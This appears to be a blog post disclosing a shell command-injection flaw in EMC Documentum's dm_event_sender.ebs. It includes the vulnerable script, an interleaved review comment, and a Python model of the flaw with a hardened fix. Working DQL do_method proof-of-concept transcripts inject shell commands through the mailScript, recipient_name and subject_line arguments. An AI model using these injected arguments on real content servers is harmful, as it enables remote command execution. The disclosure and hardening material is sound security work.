God bless EMC. Part II

Another brilliant example of developers’ idiocy is CS-44443. In D6.7SP1P24 EMC silently changed the dm_event_sender.ebs script:

--- /tmp/dm_event_sender.ebs    2014-01-29 19:06:52.000000000 +0300
+++ bin/dm_event_sender.ebs     2014-01-31 20:08:54.000000000 +0300
@@ -457,7 +457,7 @@
     If do_single_message = True Then
         recipient_name$ = sender_name$
     End If
-
+    mailScript$ = "./dm_mailwrapper.sh"
     mailCommand$ = mailScript _
     & " " & "-delete_contents" _
     & " " & subject_line$ _
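Review bot: hard-coding mailScript$ closes only the mailScript vector; subject_line$ on the following line (`& " " & subject_line$ _`) and the double-quoted recipient_name$ in the full listing are still concatenated unchanged into the string that ShellSync hands to the shell, so a quote or `;` inside either value still terminates the argument and runs as a separate command. The fix should validate both values (recipient must be a mail address, subject free of shell metacharacters) or, better, invoke the mail wrapper without going through a shell at all. Also, the added line assigns `mailScript$` while the next line reads `mailScript` without the `$` suffix; please confirm both names resolve to the same variable, otherwise the new assignment never reaches mailCommand$.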

Now dm_event_sender.ebs ignores the value of the mailScript parameter, but it is still vulnerable…

documentum security vulnerabilities: dm_event_sender

dm_event_sender.ebs does not check its input parameters, so any user is able to execute shell commands on the content server host using a DQL query.

'Send the completed email:

If platform$ = "WIN32" Then
    mailScript$ = ".\smail.exe"
    mailCommand$ = mailScript$ _
    & " " & "-nohttp" _
    & " " & "-delete_contents" _
    & " " & "-S " & subject_line$ _
    & " " & "-A " & recipient_name$ _
    & " " & "-F " & temp_file_name$ _
    & " " & "-Server " & smtp_server$ _
    & " " & "-M " & mail_user_name$
Else
    ' We must change the recipient if this is a single message bulk-mail.
    If do_single_message = True Then
        recipient_name$ = sender_name$
    End If

    mailCommand$ = mailScript _
    & " " & "-delete_contents" _
    & " " & subject_line$ _
    & " """ & recipient_name$ & """" _
    & " " & temp_file_name$
End If

If debug = "1" Then
  LogMsg("mailCommand= " & mailCommand$)
End If

result% = ShellSync(mailCommand)
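The Unix branch above builds one shell string by concatenation and hands it to ShellSync, which is why a `"` or `;` inside recipient_name$ or subject_line$ ends the argument and starts a new command. The following Python model is added here and is not part of the original post or of EMC's script: it re-implements that string building, tokenises the result the way a POSIX shell would (nothing is executed) using the recipient value from the second transcript as a constructed input, and shows the hardened alternative, which is what a fix should look like: a fixed mail program path (the only thing the vendor patch did), a validated recipient, and an argv list run without a shell. MAIL_SCRIPT, build_mail_argv, shell_command_count and the address regex are assumptions of this example, not names from the script.

```python
import re
import shlex
import subprocess

# Assumed configuration value for this example: the hardened version takes the
# mail program from here, never from the caller's arguments.
MAIL_SCRIPT = "./dm_mailwrapper.sh"

# Constructed test input: the recipient value used in the post's second
# transcript. It is only tokenised here, never passed to a shell.
INJECTED_RECIPIENT = '"; /bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;"'


def build_mail_command_vulnerable(mail_script, subject_line, recipient_name, temp_file_name):
    """Model of the Unix branch of dm_event_sender.ebs: everything is glued
    into one string that ShellSync hands to a shell. The subject is not quoted
    at all, the recipient is wrapped in double quotes, and no value is checked,
    so a '"' or ';' inside either one ends the argument and begins a new command."""
    return (mail_script
            + " -delete_contents"
            + " " + subject_line
            + ' "' + recipient_name + '"'
            + " " + temp_file_name)


def shell_command_count(command_line):
    """Tokenise a command line the way a POSIX shell would (quotes honoured,
    ';', '&' and '|' split out as operators) and return how many simple
    commands it contains. 1 means every value stayed inside the one mail
    invocation; anything higher means injected commands."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=";&|")
    lexer.whitespace_split = True
    separators = [t for t in lexer if t and all(ch in ";&|" for ch in t)]
    return len(separators) + 1


# Assumed, deliberately conservative address shape; adapt to local policy.
_RECIPIENT_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def build_mail_argv(subject_line, recipient_name, temp_file_name):
    """Hardened form. The mail program path is fixed (as the vendor patch does),
    the recipient must look like a mail address, the subject may not carry
    line breaks, and the result is an argv list: executed without a shell,
    each value reaches the mail program as exactly one argument, so shell
    metacharacters inside it are just characters."""
    if not _RECIPIENT_RE.fullmatch(recipient_name):
        raise ValueError("recipient is not a mail address: %r" % recipient_name)
    if any(ch in subject_line for ch in "\r\n\0"):
        raise ValueError("subject contains control characters")
    return [MAIL_SCRIPT, "-delete_contents", subject_line, recipient_name, temp_file_name]


def preview_command(argv):
    """Return the shell-quoted line a shell would need to reproduce this argv,
    for logging and for checking that quoting is intact."""
    return shlex.join(argv)


def send_mail(subject_line, recipient_name, temp_file_name):
    """Run the hardened command without a shell (shell=False is the default,
    spelled out here because it is the whole point)."""
    argv = build_mail_argv(subject_line, recipient_name, temp_file_name)
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    vulnerable = build_mail_command_vulnerable(MAIL_SCRIPT, "Subject", INJECTED_RECIPIENT, "/tmp/xxxx")
    print("vulnerable string:", vulnerable)
    print("commands a shell would run:", shell_command_count(vulnerable))
    try:
        build_mail_argv("Subject", INJECTED_RECIPIENT, "/tmp/xxxx")
    except ValueError as err:
        print("hardened builder rejected it:", err)
    argv = build_mail_argv("Re: foo; bar", "alice@example.com", "/tmp/xxxx")
    print("hardened argv:", argv)
    print("commands a shell would run:", shell_command_count(preview_command(argv)))
```

The tokeniser is only a model of shell parsing, good enough to show that the injected recipient turns one mail command into three; the real lesson is in build_mail_argv, where a subject such as `Re: foo; bar` stays a single argument because no shell ever sees it.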

Exploitation of the mailScript parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" ""
> "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx"
> "/bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;"
> " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

Exploitation of the recipient_name parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender', 
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" "" "" "" 
> "\"; /bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;\"" 
> "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

Exploitation of the subject_line parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "\`touch /tmp/text.txt\`"
> "" "" "" "" "" "" "" "" "" "" "" "" "" "WIN32" "xxx"
> "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " "127.0.0.1"'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
 ~]$

This vulnerability was reported as CS-44443 (Security vulnerability with dm_event_sender allows execution of applications on Content Server host).